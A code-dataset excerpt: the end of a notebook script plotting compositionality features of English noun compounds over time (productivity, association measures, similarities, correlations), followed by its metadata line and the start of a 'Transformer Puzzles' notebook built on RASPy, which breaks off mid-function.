inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_head_prod_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.legend(loc='upper left')\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Productivity of Head\")\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'head_prod_merged')\n\nplot_mod_prod_df = get_plot_df(mod_prod_cols)\nplot_mod_prod_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_mod_prod_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Productivity of Modifier\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'modprod_merged')\n\nplot_lmi_df = get_plot_df(lmi_cols)\nplot_lmi_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_lmi_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"LMI\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'LMI_merged')\n\nplot_llr_df = get_plot_df(llr_cols)\nplot_llr_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_llr_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"LLR\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'LLR_merged')\n\nplot_ppmi_df = get_plot_df(ppmi_cols)\nplot_ppmi_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_ppmi_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"PPMI\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'PPMI_merged')\n\nplot_sim_bw_constituents_df = get_plot_df(sim_bw_constituents_cols)\nplot_sim_bw_constituents_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_bw_constituents_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity between constituents\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-bw-const_merged')\n\nplot_sim_with_head_df = get_plot_df(sim_with_head_cols)\nplot_sim_with_head_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_with_head_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity with head\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-with-head_merged')\n\nplot_sim_with_modifier_df = get_plot_df(sim_with_modifier_cols)\nplot_sim_with_modifier_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"variable\", y=\"value\", hue=\"Compositionality Rating\", hue_order=[\"low-rated\", \"high-rated\"],style=\"Compositionality Rating\",data=plot_sim_with_modifier_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Similarity with modifier\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nsave_plots(g, 'sim-with-mod_merged')\n\ncompounds=pd.read_pickle(compoundfile)\ncompounds[\"compound\"] = compounds[\"modifier\"].str.split(\"_\").str[0]+\" \"+compounds[\"head\"].str.split(\"_\").str[0]\ncompounds = compounds.groupby([\"compound\", \"modifier\", \"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\ncompounds.head()\n\nmerge_df_aware=features[['modifier','head','compound_rating']].merge(compounds.reset_index(),on=['modifier','head'],how='inner')\n#merge_df_aware.set_index([\"modifier\", \"head\",'year','compound_rating'], inplace = True)\nmerge_df_aware.head()\n\n\ndef cosine(row1,row2):\n if row1.name[:-2]!=row2.name[:-2]:\n return np.nan\n else:\n denom1=np.sqrt(np.sum(np.square(row1)))\n denom2=np.sqrt(np.sum(np.square(row2)))\n num=np.sum(row1*row2)\n return num/(denom1*denom2)\n\n\ncosine(merge_df_aware.iloc[2-1],merge_df_aware.iloc[2])\n\ncosine_compound_agnostic=[np.nan]\nfor i in range(1,merge_df_aware.shape[0]):\n cosine_compound_agnostic.append(cosine(merge_df_aware.iloc[i-1],merge_df_aware.iloc[i]))\n\nmerge_df_aware['compound_cosine']=cosine_compound_agnostic\ncompound_df=pd.pivot_table(merge_df_aware.reset_index(), values = 'compound_cosine', index=['modifier','head','compound_rating'], columns = 'time')\n\ncompound_df.reset_index(inplace=True)\ncompound_df['compound']=compound_df['modifier'].str[:-5]+' '+compound_df['head'].str[:-5]\ncompound_df.drop(['modifier','head'],axis=1,inplace=True)\n#plot_compound_df=plot_compound_df.loc[plot_compound_df['compound'].isin(selected_compounds)]\n#compound_df.set_index('compound',inplace=True)\n#plot_compound_df=plot_compound_df[plot_compound_df.columns[10:]]\nplot_compound_df=pd.melt(compound_df,id_vars=['compound','compound_rating'],\n value_vars=[c for c in compound_df.columns if c not in (\"compound_rating\", \"compound\")])\n\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"time\", y=\"value\", hue=\"compound_rating\", hue_order=[\"low\", \"med\", \"high\"],style=\"compound_rating\",data=plot_compound_df,palette=\"Dark2\",linewidth=1,dashes=False)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Compound cosine\")\n#g.legend(title='Compound Rating', loc='upper left', labels=[\"high\", \"low\", \"med\"])\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\ng.set_xlim(1900, 2009)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'compound-cosine_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, dimension))\n\nheads=pd.read_pickle(constituentsfile)\n#heads.index.set_names('head',level=0,inplace=True)\nheads.head()\n\nmerge_df_aware_heads=features[['modifier','head']].merge(heads.reset_index(),on=['head'],how='inner')\nmerge_df_aware_heads.set_index([\"modifier\", \"head\",'time'], inplace = True)\nmerge_df_aware_heads.head()\n\ncosine_head_agnostic=[np.nan]\nfor i in range(1,merge_df_aware_heads.shape[0]):\n cosine_head_agnostic.append(cosine(merge_df_aware_heads.iloc[i-1],merge_df_aware_heads.iloc[i]))\n\n\nmerge_df_aware_heads['head_cosine']=cosine_head_agnostic\nhead_df=pd.pivot_table(merge_df_aware_heads.reset_index(), values = 'head_cosine', index=['modifier','head'], columns = 'time')\n\nplot_head_df=head_df.reset_index()\nplot_head_df['compound']=plot_head_df['modifier'].str[:-5]+' '+plot_head_df['head'].str[:-5]\nplot_head_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_head_df.set_index('compound',inplace=True)\n\n# Add counts\ncompounds=pd.read_csv(\"../../../Compounding/coha_compounds/compounds.csv\",sep=\"\\t\")\ncompounds[\"compound\"] = compounds[\"modifier\"].str[:-5]+\" \"+compounds[\"head\"].str[:-5]\ncompounds = compounds.groupby([\"compound\", \"modifier\", \"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\nmodifiers=pd.read_csv(\"../../../Compounding/coha_compounds/modifiers.csv\",sep=\"\\t\")\nmodifiers = modifiers.groupby([\"modifier\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\nheads=pd.read_csv(\"../../../Compounding/coha_compounds/heads.csv\",sep=\"\\t\")\nheads = heads.groupby([\"head\", \"year\"])[[\"count\"]].agg(\"sum\").reset_index()\n\nmerge_df = pd.merge(compounds, modifiers, on=[\"modifier\", \"year\"])\nmerge_df = pd.merge(merge_df, heads, on=[\"head\", \"year\"])\nmerge_df = merge_df[[\"compound\",\"year\",\"count_x\",\"count_y\",\"count\"]]\nmerge_df.columns = [\"compound_surface\",\"year\", \"compound\",\"mod\",\"head\"]\nmerge_df = merge_df.groupby([\"compound_surface\", \"year\"])[[\"compound\", \"mod\", \"head\"]].agg(\"sum\").reset_index()\nmerge_df = pd.melt(merge_df, id_vars=[\"compound_surface\", \"year\"], var_name=\"type\", value_name=\"count\")\nmerge_df\n\n# +\nsim_with_head_df=features.set_index([\"modifier\", \"head\"])[sim_with_head_cols]\nsim_with_head_df.columns=[v.split(\":\")[1] for v in sim_with_head_df.columns]\nplot_sim_with_head_df=sim_with_head_df.reset_index()\nplot_sim_with_head_df['compound']=plot_sim_with_head_df['modifier']+' '+plot_sim_with_head_df['head']\nplot_sim_with_head_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_with_head_df.set_index('compound',inplace=True)\nplot_sim_with_head_df = plot_sim_with_head_df.stack().reset_index()\nplot_sim_with_head_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_with_head_df['Feature'] = \"sim_with_head\"\n\nsim_with_mod_df=features.set_index([\"modifier\", \"head\"])[sim_with_modifier_cols]\nsim_with_mod_df.columns=[v.split(\":\")[1] for v in sim_with_mod_df.columns]\nplot_sim_with_mod_df=sim_with_mod_df.reset_index()\nplot_sim_with_mod_df['compound']=plot_sim_with_mod_df['modifier']+' '+plot_sim_with_mod_df['head']\nplot_sim_with_mod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_with_mod_df.set_index('compound',inplace=True)\nplot_sim_with_mod_df = plot_sim_with_mod_df.stack().reset_index()\nplot_sim_with_mod_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_with_mod_df['Feature'] = \"sim_with_mod\"\n\nsim_bw_const_df=features.set_index([\"modifier\", \"head\"])[sim_bw_constituents_cols]\nsim_bw_const_df.columns=[v.split(\":\")[1] for v in sim_bw_const_df.columns]\nplot_sim_bw_const_df=sim_bw_const_df.reset_index()\nplot_sim_bw_const_df['compound']=plot_sim_bw_const_df['modifier']+' '+plot_sim_bw_const_df['head']\nplot_sim_bw_const_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_sim_bw_const_df.set_index('compound',inplace=True)\nplot_sim_bw_const_df = plot_sim_bw_const_df.stack().reset_index()\nplot_sim_bw_const_df.columns=[\"compound\", \"year\", \"value\"]\nplot_sim_bw_const_df['Feature'] = \"sim_bw_constituents\"\n\nplot_sim_head_mod_df = plot_sim_with_head_df.append(plot_sim_with_mod_df)\nplot_sim_head_mod_df = plot_sim_head_mod_df.append(plot_sim_bw_const_df)\n\nplot_sim_head_mod_df = plot_sim_head_mod_df[plot_sim_head_mod_df.value != 0]\nplot_sim_head_mod_df.year = pd.to_numeric(plot_sim_head_mod_df.year)\n# -\n\nfor i in plot_sim_head_mod_df[[\"compound\"]].drop_duplicates().values.tolist():\n i = i[0]\n if compounds[compounds[[\"compound\"]] == i][\"count\"].sum() >= 200:\n print(i, compounds[compounds.compound == i][\"count\"].sum())\n\nfor i in plot_sim_head_mod_df.compound.unique():\n if i == \"guinea pig\":\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1, 2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = \"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_sim_head_mod_df.loc[plot_sim_head_mod_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<', '>'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n sort = True,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_sims_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_sims_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_sims_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_sims_{}.pgf'.format(i))\n plt.show()\n\n# +\nmod_prod_df=features.set_index([\"modifier\", \"head\"])[mod_prod_cols]\nmod_prod_df.columns=[v.split(\":\")[1] for v in mod_prod_df.columns]\nplot_mod_prod_df=mod_prod_df.reset_index()\nplot_mod_prod_df['compound']=plot_mod_prod_df['modifier']+' '+plot_mod_prod_df['head']\nplot_mod_prod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_mod_prod_df.set_index('compound',inplace=True)\nplot_mod_prod_df = plot_mod_prod_df.stack().reset_index()\nplot_mod_prod_df.columns=[\"compound\", \"year\", \"value\"]\nplot_mod_prod_df['Feature'] = \"mod_prod\"\n\nhead_prod_df=features.set_index([\"modifier\", \"head\"])[head_prod_cols]\nhead_prod_df.columns=[v.split(\":\")[1] for v in head_prod_df.columns]\nplot_head_prod_df=head_prod_df.reset_index()\nplot_head_prod_df['compound']=plot_head_prod_df['modifier']+' '+plot_head_prod_df['head']\nplot_head_prod_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_head_prod_df.set_index('compound',inplace=True)\nplot_head_prod_df = plot_head_prod_df.stack().reset_index()\nplot_head_prod_df.columns=[\"compound\", \"year\", \"value\"]\nplot_head_prod_df['Feature'] = \"head_prod\"\n\nplot_prod_head_mod_df = plot_mod_prod_df.append(plot_head_prod_df)\n\nplot_prod_head_mod_df = plot_prod_head_mod_df[plot_prod_head_mod_df.value != 0]\n# -\n\nfor i in plot_prod_head_mod_df.compound.unique():\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1,2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = \"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_prod_head_mod_df.loc[plot_prod_head_mod_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_prod_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_prod_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_prod_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_prod_{}.pgf'.format(i))\n\n# +\nlmi_df=features.set_index([\"modifier\", \"head\"])[lmi_cols]\nlmi_df.columns=[v.split(\":\")[1] for v in lmi_df.columns]\nplot_lmi_df=lmi_df.reset_index()\nplot_lmi_df['compound']=plot_lmi_df['modifier']+' '+plot_lmi_df['head']\nplot_lmi_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_lmi_df.set_index('compound',inplace=True)\nplot_lmi_df = plot_lmi_df.stack().reset_index()\nplot_lmi_df.columns=[\"compound\", \"year\", \"value\"]\nplot_lmi_df['Feature'] = \"lmi\"\n\nllr_df=features.set_index([\"modifier\", \"head\"])[llr_cols]\nllr_df.columns=[v.split(\":\")[1] for v in llr_df.columns]\nplot_llr_df=llr_df.reset_index()\nplot_llr_df['compound']=plot_llr_df['modifier']+' '+plot_llr_df['head']\nplot_llr_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_llr_df.set_index('compound',inplace=True)\nplot_llr_df = plot_llr_df.stack().reset_index()\nplot_llr_df.columns=[\"compound\", \"year\", \"value\"]\nplot_llr_df['Feature'] = \"llr\"\n\nppmi_df=features.set_index([\"modifier\", \"head\"])[ppmi_cols]\nppmi_df.columns=[v.split(\":\")[1] for v in ppmi_df.columns]\nplot_ppmi_df=ppmi_df.reset_index()\nplot_ppmi_df['compound']=plot_ppmi_df['modifier']+' '+plot_ppmi_df['head']\nplot_ppmi_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_ppmi_df.set_index('compound',inplace=True)\nplot_ppmi_df = plot_ppmi_df.stack().reset_index()\nplot_ppmi_df.columns=[\"compound\", \"year\", \"value\"]\nplot_ppmi_df['Feature'] = \"ppmi\"\n\nplot_info_df = plot_lmi_df.append(plot_llr_df)\nplot_info_df = plot_info_df.append(plot_ppmi_df)\n\nplot_info_df = plot_info_df[plot_info_df.value != 0]\nplot_info_df.year = pd.to_numeric(plot_info_df.year)\n# -\n\nfor i in plot_info_df.compound.unique():\n if i == \"guinea pig\":\n #if compounds[compounds.compound == i][\"count\"].sum() >= 200:\n #fig, ax = plt.subplots(1,2, figsize=(20,10))\n plt.figure(figsize=(15,15))\n \"\"\"\n h=sns.lineplot(x = \"year\", y = \"count\", data=merge_df.loc[merge_df['compound_surface'] == i],\n style = \"type\",\n hue = \"type\",\n markers=['o', '<', '>'],\n dashes = False,\n palette = \"Paired\",\n ax = ax[0])\n h.set_title(i)\n \"\"\"\n g=sns.lineplot(x = \"year\", y = \"value\", data=plot_info_df.loc[plot_info_df['compound'] == i],\n hue = \"Feature\",\n style = \"Feature\",\n #palette=\"Set2\", \n markers=['o', '<', '>'],\n linewidth = 2,\n legend = \"brief\",\n dashes = False,\n #ax = ax[1]\n )\n #g.legend(loc='center left', bbox_to_anchor=(1.25, 0.5), ncol=1)\n #g.xaxis.set_major_locator(ticker.MultipleLocator(20))\n g.set_title(\"Compound: \" + i.title())\n g.set_xlabel(\"Year\")\n g.set_ylabel(\"Feature Value\")\n plt.setp(g.get_xticklabels(), rotation=60)\n plt.savefig(plotdir+'single_compounds_inf_{}.png'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_inf_{}.jpg'.format(i), dpi=300)\n #plt.savefig(plotdir+'single_compounds_inf_{}.tiff'.format(i), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'single_compounds_inf_{}.pgf'.format(i))\n\nplot_features_df = pd.concat([plot_info_df, plot_prod_head_mod_df, plot_sim_head_mod_df])\n\nyear_token_counts = pd.read_csv('../../data/coha_year_token_count.csv')\nyear_token_counts.columns = ['year', 'tokencount']\nyear_token_counts\n\nplot_count_df = compounds[compounds.compound.isin(plot_features_df.compound.unique())]\nplot_count_df = pd.merge(plot_count_df, plot_sim_with_modifier_df[[\"compound\",\"Compositionality Rating\"]], on=\"compound\")\nplot_count_df = plot_count_df.merge(year_token_counts, on='year')\nplot_count_df[\"normcount\"] = plot_count_df[\"count\"]/plot_count_df[\"tokencount\"]\nplot_count_df[\"normcount\"].fillna(0, inplace=True)\nplot_count_df[\"normcount\"] -= plot_count_df[\"normcount\"].min()\nplot_count_df[\"normcount\"] /= plot_count_df[\"normcount\"].max()\nplot_count_df\n\nplot_count_df.rename(columns = {\"compound_rating\": \"Compositionality Rating\"}, inplace=True)\nplt.figure(figsize=(15,15))\ng=sns.lineplot(x=\"year\", y=\"normcount\", hue=\"Compositionality Rating\", hue_order=[\"low\", \"med\", \"high\"], style=\"Compositionality Rating\",data=plot_count_df,palette=\"Dark2\", marker='o',linewidth=1,dashes=False,markers=True)#,err_style=\"bars\", ci=68)\ng.set_xlabel(\"Time\")\ng.set_ylabel(\"Normalized Count\")\ng.legend(loc='upper left')\n#g.legend(loc='center left', bbox_to_anchor=(1.0, 0.5), ncol=1)\n#g.set_xlim(1799, 2000)\nplt.setp(g.get_xticklabels(), rotation=60)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'compound-counts-merged_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, dimension))\n\nplot_comp_ratings_df = features[[\"modifier\", \"head\", \"modifier_mean\", \"head_mean\", \"compound_mean\"]]\nplot_comp_ratings_df[\"year\"] = 2000\nplot_comp_ratings_df['compound']=plot_comp_ratings_df['modifier'].str[:-5]+' '+plot_comp_ratings_df['head'].str[:-5]\nplot_comp_ratings_df.drop(['modifier','head'],axis=1,inplace=True)\nplot_comp_ratings_df = pd.melt(plot_comp_ratings_df, id_vars=[\"year\",\"compound\"],\n value_vars=['modifier_mean', 'head_mean', 'compound_mean'])\nplot_comp_ratings_df.rename(columns = {'variable':'Feature'}, inplace = True)\nplot_comp_ratings_df = plot_comp_ratings_df[['compound', 'year', 'value', 'Feature']]\nplot_comp_ratings_df\n\ncorr_count_df = plot_count_df[[\"compound\",\"year\",\"count\"]]\ncorr_count_df[\"Feature\"] = \"count\"\ncorr_count_df.rename(columns = {'count':'value'}, inplace = True)\ncorr_count_df = pd.concat([plot_features_df, corr_count_df])\ncorr_count_df = pd.concat([plot_comp_ratings_df ,corr_count_df])\ncorr_count_df.drop_duplicates(inplace=True)\ncorr_count_df['year'] = pd.to_numeric(corr_count_df['year'])\ncorr_count_df = corr_count_df.pivot_table(values=['value'], index=['year','compound'], columns=['Feature'])\ncorr_count_df.columns = corr_count_df.columns.get_level_values(1)\ncorr_count_df = corr_count_df[[\"count\", \"compound_mean\", \"head_mean\", \"modifier_mean\", \"sim_with_head\", \"sim_with_mod\", \"head_prod\", \"mod_prod\",\n \"lmi\", \"llr\", \"ppmi\"]]\ncorr_count_df\n\nmask = np.zeros_like(corr_count_df.corr())\nmask[np.triu_indices_from(mask, k=1)] = True\nplt.figure(figsize=(25, 25))\ng = sns.heatmap(corr_count_df.corr(), annot=True, vmin=-1, vmax=1, cmap=\"YlGnBu\", mask=mask, cbar=False)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.png'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.jpg'.format(mode, timespan, cutoff, dimension), dpi=300)\nplt.savefig(plotdir+'corr_{}_{}_{}_{}.tiff'.format(mode, timespan, cutoff, dimension), dpi=300)\nif use_pgf:\n plt.savefig(plotdir+'corr_{}_{}_{}_{}.pgf'.format(mode, timespan, cutoff, dimension))\n\nfor year, new_df in corr_count_df.groupby(level=0):\n mask = np.zeros_like(new_df.corr())\n mask[np.triu_indices_from(mask, k=1)] = True\n plt.figure(figsize=(25, 25))\n g = sns.heatmap(new_df.corr(), annot=True, vmin=-1, vmax=1, cmap=\"YlGnBu\", mask=mask, cbar=False)\n g.set_title(\"Correlations for time span {}\".format(year))\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.png'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.jpg'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.tiff'.format(year, mode, timespan, cutoff, dimension), dpi=300)\n if use_pgf:\n plt.savefig(plotdir+'corr-{}_{}_{}_{}_{}.pgf'.format(year, mode, timespan, cutoff, dimension))\n","repo_name":"prajitdhar/Compounding","sub_path":"compositionality_over_time/Notebooks/coha_vis.ipynb","file_name":"coha_vis.ipynb","file_ext":"py","file_size_in_byte":29336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"496779257","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"f8117f57\"\n# # Transformer Puzzles\n\n# + [markdown] id=\"e9e822cb\"\n# This notebook is a collection of short coding puzzles based on the internals of the Transformer. The puzzles are written in Python and can be done in this notebook. After completing these you will have a much better intutive sense of how a Transformer can compute certain logical operations. \n#\n# These puzzles are based on [Thinking Like Transformers](https://arxiv.org/pdf/2106.06981.pdf) by Gail Weiss, Yoav Goldberg, Eran Yahav and derived from this [blog post](https://srush.github.io/raspy/).\n\n# + [markdown] id=\"8e962052\"\n# ## Goal\n#\n# **Can we produce a Transformer that does basic addition?**\n#\n# i.e. given a string \"19492+23919\" can we produce the correct output? \n\n# + [markdown] id=\"d332140b\"\n# ## Rules\n#\n# Each exercise consists of a function with a argument `seq` and output `seq`. Like a transformer we cannot change length. Operations need to act on the entire sequence in parallel. There is a global `indices` which tells use the position in the sequence. If we want to do something different on certain positions we can use `where` like in Numpy or PyTorch. To run the seq we need to give it an initial input. \n\n# + id=\"6c5c885a\"\n# %%capture\n# !pip install -qqq git+https://github.com/chalk-diagrams/chalk git+https://github.com/srush/RASPy \n\n# + id=\"51724e11\"\nfrom IPython.display import display, HTML\nfrom raspy import key, query, tokens, indices, where, draw\nimport random\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 96} id=\"1b28dc98\" outputId=\"f1ac1157-3db8-40c0-dbb2-7d9bad8943a0\"\ndef even_vals(seq=tokens):\n \"Keep even positions, set odd positions to -1\"\n x = indices % 2\n # Note that all operations broadcast so you can use scalars.\n return where(x == 0, seq, -1)\nseq = even_vals()\n\n# Give the initial input tokens\nseq.input([0,1,2,3,4])\n\n# + [markdown] id=\"9dc23f88\"\n# The main operation you can use is \"attention\". You do this by defining a selector which forms a matrix based on `key` and `query`.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 176} id=\"e2ee0ff8\" outputId=\"a61ac19c-2550-4f3c-d653-50c323cdfd59\"\nbefore = key(indices) < query(indices)\nbefore\n\n# + [markdown] id=\"a4de0a14\"\n# We can combine selectors with logical operations.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 201} id=\"c315ba6d\" outputId=\"270d50fa-649c-438b-8606-d3d078478162\"\nbefore_or_same = before | (key(indices) == query(indices))\nbefore_or_same\n\n\n# + [markdown] id=\"00bc66a3\"\n# Once you have a selector, you can apply \"attention\" to sum over the grey positions. For example to compute cumulative such we run the following function. \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 326} id=\"e79c8c8b\" outputId=\"44db7f90-502d-497c-c5ba-4062c09f0a9a\"\ndef cumsum(seq=tokens):\n return before_or_same.value(seq)\nseq = cumsum()\nseq.input([0, 1, 2, 3, 4])\n\n# + cellView=\"form\" id=\"9ae57559\"\n#@title Test Code (Collapse)\ndef atoi(seq=tokens):\n return seq.map(lambda x: ord(x) - ord('0'))\n\ndef test_output(user, spec, token_sets):\n for ex_num, token_set in enumerate(token_sets): \n out1 = user(*token_set[:-1])((token_set[-1]))\n out2 = 